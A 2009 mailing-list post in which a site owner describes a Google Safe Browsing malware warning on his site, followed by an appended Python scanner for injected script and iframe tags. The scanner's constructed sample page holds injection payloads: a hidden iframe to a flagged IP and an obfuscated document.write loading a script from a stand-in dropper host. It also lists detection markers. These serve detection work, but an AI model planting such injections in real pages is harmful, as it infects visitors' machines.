Date : Tue, 23 Jun 2009 00:22:05 +0200
From : rick@... (Rick Murray)
Subject: Potential malware warning - very OT but...
Hello everybody,
This is extremely off-topic, but as Beeb stuff is hosted on my site, I'd
be failing in my duty as a conscientious person if I didn't say
anything. For reasons that will become clear, I couldn't exactly add
this message to my website.
If you use a PC to access heyrick.co.uk, you may have already
encountered the bright red "panic! panic! pee in your pant(ie)s now!"
warning about malware on my site.
I, personally, have a rather lackadaisical attitude to who is accessing
my site. I want your name and email address if you are buying something,
or want support... but beyond that, I don't really care. I don't use
cookies, it's nice to know what people are looking at, but since I've
spent *EIGHT* years offline (can't believe Paul Vigay is no longer!
sob!), I am not at all obsessed with how many hits I get. If I get a
million, cool. If I get none, whatever...
So the idea of malware is like a TOTAL anathema. I might work a 35 hour
week on minimum wage, but somehow it's rather more satisfying than
ripping off bank accounts.
My friend in London (hi! he reads this list) sent me the report:
--8<--------
What is the current listing status for www.heyrick.co.uk?
Site is listed as suspicious - visiting this web site may harm your
computer.
Part of this site was listed for suspicious activity 2 time(s) over the
past 90 days.
What happened when Google visited this site?
Of the 139 pages we tested over the past 90 days, 73 page(s) resulted in
malicious software being downloaded and installed without user consent.
The last time Google visited this site was on 2009-06-21, and the last
time suspicious content was found on this site was on 2009-06-21.
Malicious software is hosted on 1 domain(s), including 92.38.0.0/.
1 domain(s) appear to be functioning as intermediaries for distributing
malware to visitors of this site, including m-analytics.net/.
This site was hosted on 1 network(s) including AS39451 (MELBOURNE).
Has this site acted as an intermediary resulting in further distribution
of malware?
Over the past 90 days, www.heyrick.co.uk did not appear to function as
an intermediary for the infection of any sites.
Has this site hosted malware?
No, this site has not hosted malicious software over the past 90 days.
How did this happen?
In some cases, third parties can add malicious code to legitimate sites,
which would cause us to show the warning message.
[snip "next steps" stuff]
--8<--------
My site is actually hosted on www2.squirrelinternet.co.uk; I'm sure some
tool or other will tell you where that is located. I *think* Manchester.
Sure as hell isn't Melbourne!
Oh, and while you are scratching your head, perhaps you can ponder why
my site is reported as having 73 of 139 pages that caused malicious
software to be installed (wonder how they tested that?!?), yet a coupla
paragraphs later it says my site hasn't hosted malicious software. Eh!?!?
My friend then looked at this Melbourne server:
--8<--------
Safe Browsing Diagnostic page for AS39451 (MELBOURNE).
What happened when Google visited sites hosted on this network?
Of the 2223 site(s) we tested on this network over the past 90 days, 99
site(s), including, for example, flixman.com/, heyrick.co.uk/,
medelhawaii.com/, served content that resulted in malicious software
being downloaded and installed without user consent.
The last time Google tested a site on this network was on 2009-06-22,
and the last time suspicious content was found was on 2009-06-21.
Has this network hosted sites acting as intermediaries for further
malware distribution?
Over the past 90 days, we found 4 site(s) on this network, including,
for example, buyonlineticket.com/, reallifemarketing.org/,
visaworld.us/, that appeared to function as intermediaries for the
infection of 4 other site(s) including, for example, devimultiplex.com/,
skinfoways.com/, toolshed.co.uk/.
Has this network hosted sites that have distributed malware?
Yes, this network has hosted sites that have distributed malicious
software in the past 90 days. We found 3 site(s), including, for
example, visaworld.us/, digitalbroadcasters.co.uk/,
buyonlineticket.com/, that infected 5 other site(s), including, for
example, tnydeli.co.uk/, mcpatiala.com/, devimultiplex.com/.
[next steps stuff omitted]
--8<--------
If "visaworld.us", "buyonlineticket.com", and
"digitalbroadcasters.co.uk" are real sites and not viable hoaxes (like
various misspellings of Google and Microsoft...), then this is a bigger
problem than just my site. Furthermore, it's little comfort to be lumped
in with the likes of visaworld, but it's certainly odd. Oh, and don't do
the Google maths, I'm finding this stuff doesn't seem to be adding up!
Still have no idea what Melbourne has to do with anything.
I have a trusted friend (a different one, yes, I have more than one
friend and they're real people too! <giggle>) who I've given carte
blanche to do whatever is necessary to sort this. I hope it is some
nasty DNS spoof or some giant cache site that's gone badly astray, or
maybe Google itself?
However if anything has managed to compromise heyrick (amid the sftp and
ssh!), then it'll be ripped out - even if that means rm'ing the whole
damn site. Well, no, there appear to be 66 good pages!
On the plus side, I've just signed a contract for 8Mbit ADSL which I
think ought to arrive in a week or two. FINALLY! Then I can spend all my
spare time looking at really stupid stuff on YouTube :-) instead of
doing anything remotely useful. At least I'll be able to answer mails
with a better turnaround than ~ two weeks!
ANYWAY, thanks for reading, and if you plan to access my site on a PC
(amid all those scary warnings), make sure you are running
anti-everything and lock your system up tighter than a Victorian corset.
Or use a RISC OS machine and go "nerr-nerr!". :-)
Best wishes,
a confused and somewhat irked Rick...
--
Rick Murray, irregular internet access at local library.
BBC B: ANFS, 2 x 5.25" floppies, EPROM prog, Acorn TTX
E01S FileStore, A3000/A5000/RiscPC/various PCs/blahblah...
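Added example, not part of Rick's message and not any tool his friends used. The quoted Safe Browsing report says the site itself hosted nothing but that an intermediary (m-analytics.net) and a host on 92.38.0.0/ were involved, which is the signature of script or iframe tags injected into otherwise legitimate pages. The script below is the check a practitioner would run over the site's HTML before deciding what to rm: it pulls every external script/iframe/object reference and every inline script out of a page and flags anything matching the report's indicators, any other third-party code host, and inline scripts using dropper-style calls (eval/unescape/document.write). The report gives no prefix length for 92.38.0.0/, so treating it as a /16 is an assumption; the two pages and the dropper.invalid host are constructed inputs, not fetched from heyrick.co.uk.

```python
"""Scan HTML pages for injected third-party script/iframe references.

Constructed example; not code from the original mailing-list message.
Indicators come from the Safe Browsing report quoted above: the
intermediary domain m-analytics.net and the malware host 92.38.0.0/.
The report gives no prefix length, so 92.38.0.0/16 is an assumption.
"""
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlparse

INTERMEDIARY_DOMAINS = {"m-analytics.net"}
MALWARE_NETWORKS = [ipaddress.ip_network("92.38.0.0/16")]  # assumed /16
# Inline-script markers typical of 2009-era injected droppers.
SUSPICIOUS_INLINE = ("eval(", "unescape(", "document.write(", "fromCharCode(")


class RefCollector(HTMLParser):
    """Collects external resource URLs and inline <script> bodies."""

    def __init__(self):
        super().__init__()
        self.refs = []      # (tag, url) for src/data attributes
        self.inline = []    # bodies of <script> blocks without src
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in ("script", "iframe", "frame", "embed") and a.get("src"):
            self.refs.append((tag, a["src"]))
        elif tag == "object" and a.get("data"):
            self.refs.append((tag, a["data"]))
        if tag == "script" and not a.get("src"):
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf))


def host_is_flagged(host):
    """True if host is a listed intermediary or inside a listed network."""
    if not host:
        return False
    host = host.lower().rstrip(".")
    if host in INTERMEDIARY_DOMAINS or any(
            host.endswith("." + d) for d in INTERMEDIARY_DOMAINS):
        return True
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return False            # a hostname, not an IP literal
    return any(addr in net for net in MALWARE_NETWORKS)


def scan_page(html, site_host):
    """Return (kind, tag, detail) findings for one page.

    kind is 'known-bad' (matches the report's indicators),
    'third-party' (loads code from some other host, worth eyeballing) or
    'obfuscated-inline' (inline script using dropper-style calls).
    """
    parser = RefCollector()
    parser.feed(html)
    parser.close()
    findings = []
    for tag, url in parser.refs:
        host = urlparse(url).hostname   # None for relative paths
        if host_is_flagged(host):
            findings.append(("known-bad", tag, url))
        elif host and host.lower() != site_host.lower():
            findings.append(("third-party", tag, url))
    for body in parser.inline:
        hits = [m for m in SUSPICIOUS_INLINE if m in body]
        if hits:
            findings.append(("obfuscated-inline", "script", ", ".join(hits)))
    return findings


# Constructed sample pages (not fetched from heyrick.co.uk).
CLEAN_PAGE = """<html><head><title>Beeb stuff</title>
<script src="/js/menu.js"></script></head>
<body><p>BBC B software archive.</p></body></html>"""

INJECTED_PAGE = """<html><head><title>Beeb stuff</title>
<script src="/js/menu.js"></script></head>
<body><p>BBC B software archive.</p>
<script src="http://m-analytics.net/ga.js"></script>
<iframe src="http://92.38.1.2/in.cgi?3" width="0" height="0"></iframe>
<script>document.write(unescape('%3Cscript src=%22http://dropper.invalid/x.js%22%3E%3C/script%3E'))</script>
</body></html>"""

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        for kind, tag, detail in scan_page(page, "www.heyrick.co.uk"):
            print(f"{name}: {kind:<17} <{tag}> {detail}")
```

Run it over every page on the host (a find over the document root, or the output of a site crawl) rather than a handful; a report that flags 73 of 139 pages while saying the site hosts nothing is consistent with a tag injected into a shared template or footer, so the same finding should repeat across most pages, and a relative src that only looks local is not cleared by this check (it never resolves the URL, so anything served by a compromised script on the same host still needs reading by hand).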